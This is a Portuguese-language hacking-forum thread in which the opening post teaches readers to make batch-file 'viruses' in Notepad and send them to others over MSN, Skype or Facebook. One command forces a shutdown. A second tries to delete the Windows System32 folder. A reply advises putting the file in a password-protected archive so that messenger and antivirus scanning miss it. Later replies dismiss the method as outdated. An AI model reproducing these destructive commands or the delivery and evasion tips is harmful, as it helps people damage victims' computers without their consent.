Ir para conteúdo
Sistema de Servidores de Jogos ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Como desligar o pc de outra pessoa!!!!!


Posts Recomendados

EU ja testei e funciona

 

Primeiro va no bloco de notas:

 

É necessário se cadastrar para acessar o conteúdo.

 

dps bote adicionar para o arquivo, dps que vc fez tudo

 

É necessário se cadastrar para acessar o conteúdo.

 

dps aparecera isso:

 

É necessário se cadastrar para acessar o conteúdo.

 

Pelo amor de deus nao clique ali

 

Mande pelo msn, skype facebbok etc.

 

Eu garanto e funcional

 

 

Ops esqueci ali um print

 

É necessário se cadastrar para acessar o conteúdo.

 

Va em arquivo ali no canto esquerdo e bote salvar como :)

 

 

Se vc nao entendeu o primeiro print aqui pra vc colar

 

1 virus:Shutdown -r -c "virus" -t 15

 

se nao quiser botar aspas nao bote

 

2 virus:@ECHO

DEL C:/WINDOWS/SYSTEM32

 

Video para comprovar o 1 virus:

 

[video=youtube;FXH0p6vkNGg]

 

Video para comprovar 2 virus:

 

[video=youtube;FXH0p6vkNGg]

Link para o comentário
https://www.webcheats.com.br/topic/1794416-como-desligar-o-pc-de-outra-pessoa/
Compartilhar em outros sites

Infelizmente ultrapassado, pois já nem sei se os msn actuais ainda aceitam transferência destes ficheiros, pois na altura em que eu brincava com isso o msn já privava e alertava o receptor. Ainda existem outros meios, mas o próprio programa já é ultrapassaso.

"Percorri caminhos que apesar de serem caminhos não eram caminhos, ouvi ruídos do obscuro e calmamente reconfortante, de paleios passei a meros trechos de sabedoria e pura eloquência, perdido na sabedoria ainda não tão ampla mas também não mais tão compacta."

Link para o comentário
https://www.webcheats.com.br/topic/1794416-como-desligar-o-pc-de-outra-pessoa/#findComment-7577716
Compartilhar em outros sites

Infelizmente ultrapassado, pois já nem sei se os msn actuais ainda aceitam transferência destes ficheiros, pois na altura em que eu brincava com isso o msn já privava e alertava o receptor. Ainda existem outros meios, mas o próprio programa já é ultrapassaso.

no caso é ultrapassado porem funcional ja que o windows até nas versões mais recentes ainda aceita alguns comandos do antigo sistema da microsoft baseado em texto. no caso do msn. basta dar um jeitinho que ele aceita o envio de arquivo com essa extensão. mais o jeito mais fácil é compactar de preferencia com senha pra impedi a verficação do msn e e antivírus porem quando vc tentar abrir o antivírus vai detecta e bloquea o acesso ao arquivo como é o minimo que se espera de um software de proteção

 

 

#topic

Até hoje não consigo entender porque fazer um "vírus" em .bat, pra mim é a coisa mais nb que existe, isso é preguiça porque se a pessoa quer realmente cria um vírus porque então num vai estuda? é pura perda de tempo esses códigos e pior que ainda que 90% de quem os usa si quer sabe pra que serve os comandos apenas copiam e colam oque faz dessas pessoas limitadas demais

python-doc-icon.jpg

wVNulLU.gif

Link para o comentário
https://www.webcheats.com.br/topic/1794416-como-desligar-o-pc-de-outra-pessoa/#findComment-7577749
Compartilhar em outros sites

Concordo 100% com o Exploiter , mais foi desse jeito asim com o .bat que eu começei , procurei "Como criar um virus" e depois não fui acreditando que dava para fazer malware pelo bloco de notas ... depois disso nunca mais parei , para fazer um viros so meu decidi aprender batch fiquei 1 semana no ajuda do windows vendo e estudando todos os codigos depois apos minhas procuras fui vendo outras formas e foi gracas a uma misera pesquisa que hoje já tenho bases de programação , exploit , scripting , linux e algumas coisas web e pretendo melhorar em todas , isso e apenas o começo niguem nasce sabendo , por isso leva o meu obrigado por compartilhar :)

Link para o comentário
https://www.webcheats.com.br/topic/1794416-como-desligar-o-pc-de-outra-pessoa/#findComment-7578023
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.